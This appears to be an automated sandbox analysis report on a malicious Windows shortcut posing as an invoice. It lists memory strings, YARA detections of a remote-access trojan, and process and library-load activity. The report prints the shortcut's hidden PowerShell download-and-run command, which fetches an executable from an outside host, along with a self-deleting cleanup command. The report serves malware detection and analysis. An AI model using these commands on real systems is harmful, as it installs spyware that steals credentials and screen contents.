Source: powershell.exe, 00000000.00000002.1746913988.000001F3D98E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E7F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E80C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: cert9.db.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.2.dr	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D7F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182015A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svhosts.exe, 00000002.00000002.2290132290.000000001C350000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000000.00000002.1770301966.000001F3F0130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: cert9.db.2.dr	String found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.2.dr	String found in binary or memory: http://x1.i.lencr.org/0
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D7F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182015A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fermazapoved.ru
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fermazapoved.ru/images/sys.exe
Source: powershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D9079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182021D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1746913988.000001F3D98E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E7F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E80C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://support.mozilla.org
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Djqfxpxi.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 62.173.145.78:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, hu5jtJKG1agB7FrDKI3.cs

.Net Code: z2TKaC5YIM

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\svhosts.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: Inovice_3_ETH.lnk

LNK file: -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','%APPDATA%\svhosts.exe');Start-Process '%APPDATA%\svhosts.exe'

Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B8A0E9E	2_2_00007FFD9B8A0E9E
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B8A04D0	2_2_00007FFD9B8A04D0
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B8A11E6	2_2_00007FFD9B8A11E6
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B8A1189	2_2_00007FFD9B8A1189
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B960F04	2_2_00007FFD9B960F04
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B963940	2_2_00007FFD9B963940
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B965FEB	2_2_00007FFD9B965FEB
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B9656F1	2_2_00007FFD9B9656F1
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA23C0D	2_2_00007FFD9BA23C0D
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1AB40	2_2_00007FFD9BA1AB40
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA13343	2_2_00007FFD9BA13343
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA3B970	2_2_00007FFD9BA3B970
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA230E7	2_2_00007FFD9BA230E7
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1C798	2_2_00007FFD9BA1C798
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1AE60	2_2_00007FFD9BA1AE60
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA39600	2_2_00007FFD9BA39600
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1AC35	2_2_00007FFD9BA1AC35
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA169D3	2_2_00007FFD9BA169D3
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA15F80	2_2_00007FFD9BA15F80
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA15FD8	2_2_00007FFD9BA15FD8
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1E7BD	2_2_00007FFD9BA1E7BD
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1E7C0	2_2_00007FFD9BA1E7C0
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1E648	2_2_00007FFD9BA1E648
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1DD90	2_2_00007FFD9BA1DD90
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA1DD65	2_2_00007FFD9BA1DD65
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA39548	2_2_00007FFD9BA39548
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9BA19C63	2_2_00007FFD9BA19C63

Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: svhosts.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2.2.svhosts.exe.1c350000.6.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformBlock'
Source: 2.2.svhosts.exe.1c350000.6.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svhosts.exe.1c350000.6.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, EjD3KIZhYgXxF43EgY5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RUyZge7gYG34YLmgatn.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@7/29@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\svhosts.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe	Mutant created: \Sessions\1\BaseNamedObjects\c8f0949f2f3d443d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eczr0fqn.rw3.ps1

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: Eqnllogrj.tmpdb.2.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Inovice_3_ETH.lnk

ReversingLabs: Detection: 70%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\svhosts.exe "C:\Users\user\AppData\Roaming\svhosts.exe"
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\svhosts.exe "C:\Users\user\AppData\Roaming\svhosts.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -Force	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: kernel.appcore.dll	Jump to behavior
